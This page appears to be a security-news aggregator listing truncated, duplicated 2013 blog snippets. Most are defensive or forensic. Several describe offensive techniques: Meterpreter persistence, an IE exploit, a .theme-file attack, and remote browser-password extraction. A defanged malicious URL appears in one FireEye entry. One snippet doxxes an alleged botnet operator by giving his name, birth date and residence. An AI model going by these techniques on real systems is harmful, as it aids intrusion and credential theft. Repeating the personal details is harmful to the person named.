Content: Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here. After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html   
Published: 2013 10 04 17:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Schedule Task in windows after Exploitation. - published over 10 years ago.
Content: Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here. After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html   
Published: 2013 10 04 17:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Another Darkleech Campaign - published over 10 years ago.
Content: Last week got us up close and personal with Darkleech and Blackhole with our external careers web site. The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL: hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php Again ...
http://www.fireeye.com/blog/threat-research/2013/10/another-darkleech-campaign.html   
Published: 2013 10 03 17:23:00
Received: 2021 06 06 09:05:11
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: Another Darkleech Campaign - published over 10 years ago.
Content: Last week got us up close and personal with Darkleech and Blackhole with our external careers web site. The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL: hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php Again ...
http://www.fireeye.com/blog/threat-research/2013/10/another-darkleech-campaign.html   
Published: 2013 10 03 17:23:00
Received: 2021 06 06 09:05:11
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: OpenIOC: Back to the Basics - published over 10 years ago.
Content: Written by Will Gibb & Devon Kerr One challenge investigators face during incident response is finding a way to organize information about an attackers' activity, utilities, malware and other indicators of compromise, called IOCs. The OpenIOC format addresses this challenge head-on. OpenIOC provides a standard format and terms...
http://www.fireeye.com/blog/threat-research/2013/10/openioc-basics.html   
Published: 2013 10 01 18:45:52
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: OpenIOC: Back to the Basics - published over 10 years ago.
Content: Written by Will Gibb & Devon Kerr One challenge investigators face during incident response is finding a way to organize information about an attackers' activity, utilities, malware and other indicators of compromise, called IOCs. The OpenIOC format addresses this challenge head-on. OpenIOC provides a standard format and terms...
http://www.fireeye.com/blog/threat-research/2013/10/openioc-basics.html   
Published: 2013 10 01 18:45:52
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Exploit For All IE version(CVE-2013-3893). - published over 10 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded h...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html   
Published: 2013 10 01 16:37:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Exploit For All IE version(CVE-2013-3893). - published over 10 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded h...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html   
Published: 2013 10 01 16:37:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Spammers already exploiting government shutdown? - published over 10 years ago.
Content: Today, I was scrolling through the endless amounts of 419 and port forward scams when one email caught my attention Subject: are you affected by the shutdown? We can help. <random # number to bypass spam filters> Hello. We're a employment agency who are hiring! After the government shut down we received a huge spike in job applications. We have noticed...
http://trojan7malware.blogspot.com/2013/10/spammers-already-exploiting-government.html   
Published: 2013 10 01 13:50:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Spammers already exploiting government shutdown? - published over 10 years ago.
Content: Today, I was scrolling through the endless amounts of 419 and port forward scams when one email caught my attention Subject: are you affected by the shutdown? We can help. <random # number to bypass spam filters> Hello. We're a employment agency who are hiring! After the government shut down we received a huge spike in job applications. We have noticed...
http://trojan7malware.blogspot.com/2013/10/spammers-already-exploiting-government.html   
Published: 2013 10 01 13:50:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Hack local network PC using windows theam file. - published over 10 years ago.
Content: This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Scr...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html   
Published: 2013 09 28 13:07:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Hack local network PC using windows theam file. - published over 10 years ago.
Content: This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Scr...
https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html   
Published: 2013 09 28 13:07:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Episode #170: Fearless Forensic File Fu - published over 10 years ago.
Content: Hal receives a cry for help Fellow forensicator Craig was in a bit of a quandary. He had a forensic image in "split raw" format-- a complete forensic image broken up into small pieces. Unfortunately for him, the pieces were named "fileaa", "fileab", "fileac", and so on while his preferred tool wanted the files to be named "file.001", "file.002", "file.003...
http://blog.commandlinekungfu.com/2013/09/episode-170-fearless-forensic-file-fu.html   
Published: 2013 09 27 09:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: Episode #170: Fearless Forensic File Fu - published over 10 years ago.
Content: Hal receives a cry for help Fellow forensicator Craig was in a bit of a quandary. He had a forensic image in "split raw" format-- a complete forensic image broken up into small pieces. Unfortunately for him, the pieces were named "fileaa", "fileab", "fileac", and so on while his preferred tool wanted the files to be named "file.001", "file.002", "file.003...
http://blog.commandlinekungfu.com/2013/09/episode-170-fearless-forensic-file-fu.html   
Published: 2013 09 27 09:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: The Ultimate downfall of a Zeus herder - published over 10 years ago.
Content: Thanks to @0xali for starting and finding this guy. I decided to take this a step further and compile his entire life into one blog post ;) Name:Akpobo Peter Age:27  D.O.B: Jan 1 1986 (source: naijaporntube.socialparody.com/pg/profile/bowell) <<<< porn was his downfall Residence:Nigeria Sanga ota, Ogun (confirmed via Facebook GPS)...
http://trojan7malware.blogspot.com/2013/09/the-ultimate-downfall-of-zues-herder.html   
Published: 2013 09 22 11:21:00
Received: 2023 03 31 23:02:33
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: The Ultimate downfall of a Zeus herder - published over 10 years ago.
Content: Thanks to @0xali for starting and finding this guy. I decided to take this a step further and compile his entire life into one blog post ;) Name:Akpobo Peter Age:27  D.O.B: Jan 1 1986 (source: naijaporntube.socialparody.com/pg/profile/bowell) <<<< porn was his downfall Residence:Nigeria Sanga ota, Ogun (confirmed via Facebook GPS)...
http://trojan7malware.blogspot.com/2013/09/the-ultimate-downfall-of-zues-herder.html   
Published: 2013 09 22 11:21:00
Received: 2023 03 31 23:02:33
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: How Will I Fill This Web Historian-Shaped Hole in My Heart? - published over 10 years ago.
Content: With the recent integration of Mandiant Web Historian™ into Mandiant Redline™, you may be asking "How do I review my Web History using Redline?" If so, then follow along as I explain how to collect and review web history data in Redline - with a focus on areas where the workflow and features differ from that of Web Historian. For tho...
http://www.fireeye.com/blog/threat-research/2013/09/fill-web-historianshaped-hole-heart.html   
Published: 2013 09 19 01:11:32
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: How Will I Fill This Web Historian-Shaped Hole in My Heart? - published over 10 years ago.
Content: With the recent integration of Mandiant Web Historian™ into Mandiant Redline™, you may be asking "How do I review my Web History using Redline?" If so, then follow along as I explain how to collect and review web history data in Redline - with a focus on areas where the workflow and features differ from that of Web Historian. For tho...
http://www.fireeye.com/blog/threat-research/2013/09/fill-web-historianshaped-hole-heart.html   
Published: 2013 09 19 01:11:32
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published over 10 years ago.
Content: In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site. Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current u...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html   
Published: 2013 09 18 15:47:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Extract & decrypt Chrome & IE passwords from Remote PC - published over 10 years ago.
Content: In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site. Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current u...
https://tipstrickshack.blogspot.com/2013/09/extract-decrypt-chrome-ie-passwords.html   
Published: 2013 09 18 15:47:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Article: The History of OpenIOC - published over 10 years ago.
Content: With the buzz in the security industry this year about sharing threat intelligence, it's easy to get caught up in the hype, and believe that proper, effective sharing of Indicators or Intelligence is something that can just be purchased along with goods or services from any security vendor. It's really a much more complex problem than ...
http://www.fireeye.com/blog/threat-research/2013/09/history-openioc.html   
Published: 2013 09 17 23:36:51
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: The History of OpenIOC - published over 10 years ago.
Content: With the buzz in the security industry this year about sharing threat intelligence, it's easy to get caught up in the hype, and believe that proper, effective sharing of Indicators or Intelligence is something that can just be purchased along with goods or services from any security vendor. It's really a much more complex problem than ...
http://www.fireeye.com/blog/threat-research/2013/09/history-openioc.html   
Published: 2013 09 17 23:36:51
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained
Cyber Tzar Top Ten Vulnerabilities Explained

All Articles

Ordered by Date Published : Year: "2013"
Page: 1 (of 3) > >>

Total Articles in this collection: 175


  • "All Articles" links back to the front page, effectivly the Planet "Home Page"; shows all articles, with no selections, or groupings.
  • Default date ordering is by "Received Date" (due to not all RSS feeds having a "Published Date").
  • Only Published Date selections use the articles Published Date.
  • The first page always shows fifty items plus from zero to up to a remaining forty-nine items, before they are commited permently to the next page.
  • All subsequent pages show fifty items.
  • Pagination is in reverse ordering (so that pages are permamenent links, aka "permalinks", to their content).
  • "<<" moves you to the first page (aka newest articles)
  • ">>" moves you to the last page (aka oldest articles)
  • "<" moves you to the previous page (aka newer articles)
  • ">" moves you to the next page (aka older articles)
  • Return to the top of this page Go Now

Custom HTML Block

Click to Open Code Editor